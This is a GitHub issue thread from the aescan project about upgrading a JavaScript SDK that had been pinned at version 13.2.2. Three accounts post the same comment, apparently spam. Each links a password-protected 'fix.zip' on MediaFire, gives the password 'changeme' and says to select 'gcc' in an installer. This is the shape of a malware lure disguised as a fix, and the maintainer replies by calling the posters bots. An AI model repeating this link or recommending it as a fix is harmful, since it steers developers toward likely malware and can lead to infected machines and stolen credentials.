### ISSUE TITLE
Upgrade SDK version

### ISSUE THREAD

**Issue by janmichek** [aeternity/aescan#898]
### Context information

application version: 
device: 
browser: 
operating system: 

### What is expected?
I believe it's something on SDK side, hence I created the issue for 
TRACKING https://github.com/aeternity/aepp-sdk-js/issues/2012

The version needed to be downgraded to 13.2.2 due to implementation of this feature https://github.com/aeternity/aescan/issues/256

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by janmichek** [comment]
Ok thanks, bots

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
